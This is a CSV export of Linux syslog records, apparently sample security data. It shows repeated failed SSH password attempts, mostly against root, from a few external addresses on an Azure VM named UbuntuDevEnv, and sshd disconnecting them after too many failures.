+15050,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:14:57,UbuntuDevEnv,2019-06-26 05:14:57,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.41.208.238,7456,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.41.208.2,,0,
+15051,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:14:57,UbuntuDevEnv,2019-06-26 05:14:57,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,7456,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15052,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:14:59,UbuntuDevEnv,2019-06-26 05:14:58,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,7465,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+15053,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:15:00,UbuntuDevEnv,2019-06-26 05:14:59,auth,UbuntuDevEnv,info,Failed password for invalid user jboss from 196.41.208.238 port 44076 ssh2,7456,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jboss,196.41.208.2,44076,,
+15054,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:15:00,UbuntuDevEnv,2019-06-26 05:14:59,auth,UbuntuDevEnv,info,Received disconnect from 196.41.208.238 port 44076:11: Bye Bye [preauth],7456,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.41.208.2,44076,,
+15055,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:15:00,UbuntuDevEnv,2019-06-26 05:14:59,auth,UbuntuDevEnv,info,Disconnected from invalid user jboss 196.41.208.238 port 44076 [preauth],7456,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jboss,196.41.208.2,44076,,
+15056,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:15:01,UbuntuDevEnv,2019-06-26 05:15:00,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 27038 ssh2,7465,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,27038,,
+15057,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:15:03,UbuntuDevEnv,2019-06-26 05:15:03,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 27038 ssh2,7465,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,27038,,
+15058,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:15:15,UbuntuDevEnv,2019-06-26 05:15:15,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 27038 ssh2 [preauth],7465,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,27038,,
+15059,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:15:15,UbuntuDevEnv,2019-06-26 05:15:15,auth,UbuntuDevEnv,info,message repeated 4 times: [ Failed password for root from 58.242.82.13 port 27038 ssh2],7465,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,27038,,
+15060,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:15:15,UbuntuDevEnv,2019-06-26 05:15:15,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,7465,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+15061,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:15:15,UbuntuDevEnv,2019-06-26 05:15:15,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 27038: Too many authentication failures [preauth],7465,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,27038,,
+15062,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:15:15,UbuntuDevEnv,2019-06-26 05:15:15,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,7465,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+15063,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:15:18,UbuntuDevEnv,2019-06-26 05:15:18,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,7568,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+15064,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:15:20,UbuntuDevEnv,2019-06-26 05:15:19,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 34641 ssh2,7568,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,34641,,
+15065,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:15:34,UbuntuDevEnv,2019-06-26 05:15:33,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,7568,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+15066,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:15:34,UbuntuDevEnv,2019-06-26 05:15:33,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 58.242.82.13 port 34641 ssh2],7568,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,34641,,
+15067,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:15:34,UbuntuDevEnv,2019-06-26 05:15:33,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 34641 ssh2 [preauth],7568,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,34641,,
+15068,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:15:34,UbuntuDevEnv,2019-06-26 05:15:33,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,7568,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+15069,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:15:34,UbuntuDevEnv,2019-06-26 05:15:33,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 34641: Too many authentication failures [preauth],7568,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,34641,,
+15070,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:15:37,UbuntuDevEnv,2019-06-26 05:15:36,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,7688,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+15071,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:15:38,UbuntuDevEnv,2019-06-26 05:15:38,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 42078 ssh2,7688,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,42078,,
+15072,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:15:45,UbuntuDevEnv,2019-06-26 05:15:43,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 58.242.82.13 port 42078 ssh2],7688,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,42078,,
+15073,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:15:46,UbuntuDevEnv,2019-06-26 05:15:46,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 42078 ssh2,7688,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,42078,,
+15074,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:15:49,UbuntuDevEnv,2019-06-26 05:15:49,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 42078 ssh2,7688,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,42078,,
+15075,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:15:51,UbuntuDevEnv,2019-06-26 05:15:51,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 42078 ssh2 [preauth],7688,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,42078,,
+15076,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:15:51,UbuntuDevEnv,2019-06-26 05:15:51,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 42078 ssh2,7688,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,42078,,
+15077,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:15:51,UbuntuDevEnv,2019-06-26 05:15:51,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 42078: Too many authentication failures [preauth],7688,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,42078,,
+15078,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:15:51,UbuntuDevEnv,2019-06-26 05:15:51,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,7688,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+15079,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:15:51,UbuntuDevEnv,2019-06-26 05:15:51,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,7688,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+15080,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:15:52,UbuntuDevEnv,2019-06-26 05:15:52,auth,UbuntuDevEnv,info,Invalid user ubuntu from 200.6.188.38 port 14763,7744,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubuntu,200.6.188.3,14763,,
+15081,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:15:52,UbuntuDevEnv,2019-06-26 05:15:52,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=200.6.188.38,7744,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,200.6.188.3,,0,
+15082,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:15:52,UbuntuDevEnv,2019-06-26 05:15:52,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,7744,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15083,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:15:54,UbuntuDevEnv,2019-06-26 05:15:54,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,7755,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+15084,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:15:55,UbuntuDevEnv,2019-06-26 05:15:54,auth,UbuntuDevEnv,info,Failed password for invalid user ubuntu from 200.6.188.38 port 14763 ssh2,7744,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubuntu,200.6.188.3,14763,,
+15085,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:15:55,UbuntuDevEnv,2019-06-26 05:15:54,auth,UbuntuDevEnv,info,Received disconnect from 200.6.188.38 port 14763:11: Bye Bye [preauth],7744,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,200.6.188.3,14763,,
+15086,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:15:55,UbuntuDevEnv,2019-06-26 05:15:54,auth,UbuntuDevEnv,info,Disconnected from invalid user ubuntu 200.6.188.38 port 14763 [preauth],7744,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubuntu,200.6.188.3,14763,,
+15087,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:15:56,UbuntuDevEnv,2019-06-26 05:15:56,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 49640 ssh2,7755,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,49640,,
+15088,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:16:02,UbuntuDevEnv,2019-06-26 05:16:01,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 58.242.82.13 port 49640 ssh2],7755,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,49640,,
+15089,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:16:03,UbuntuDevEnv,2019-06-26 05:16:03,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 49640 ssh2,7755,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,49640,,
+15090,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:16:09,UbuntuDevEnv,2019-06-26 05:16:08,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 49640 ssh2 [preauth],7755,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,49640,,
+15091,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:16:09,UbuntuDevEnv,2019-06-26 05:16:08,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 49640: Too many authentication failures [preauth],7755,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,49640,,
+15092,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:16:09,UbuntuDevEnv,2019-06-26 05:16:08,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,7755,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+15093,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:16:09,UbuntuDevEnv,2019-06-26 05:16:08,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,7755,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+15094,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:16:09,UbuntuDevEnv,2019-06-26 05:16:08,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 58.242.82.13 port 49640 ssh2],7755,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,49640,,
+15095,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:16:12,UbuntuDevEnv,2019-06-26 05:16:11,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,7824,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+15096,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:16:13,UbuntuDevEnv,2019-06-26 05:16:13,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 56851 ssh2,7824,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,56851,,
+15097,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:16:25,UbuntuDevEnv,2019-06-26 05:16:25,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 56851 ssh2 [preauth],7824,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,56851,,
+15098,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:16:25,UbuntuDevEnv,2019-06-26 05:16:25,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 56851: Too many authentication failures [preauth],7824,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,56851,,
+15099,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:16:25,UbuntuDevEnv,2019-06-26 05:16:25,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 58.242.82.13 port 56851 ssh2],7824,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,56851,,
+15100,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:16:25,UbuntuDevEnv,2019-06-26 05:16:25,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,7824,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+15101,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:16:25,UbuntuDevEnv,2019-06-26 05:16:25,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,7824,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+15102,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:16:28,UbuntuDevEnv,2019-06-26 05:16:28,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,7879,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+15103,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:16:31,UbuntuDevEnv,2019-06-26 05:16:30,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 64062 ssh2,7879,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,64062,,
+15104,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:16:43,UbuntuDevEnv,2019-06-26 05:16:43,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 58.242.82.13 port 64062 ssh2],7879,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,64062,,
+15105,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:16:43,UbuntuDevEnv,2019-06-26 05:16:43,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 64062 ssh2 [preauth],7879,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,64062,,
+15106,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:16:43,UbuntuDevEnv,2019-06-26 05:16:43,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,7879,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+15107,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:16:43,UbuntuDevEnv,2019-06-26 05:16:43,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,7879,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+15108,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:16:43,UbuntuDevEnv,2019-06-26 05:16:43,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 64062: Too many authentication failures [preauth],7879,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,64062,,
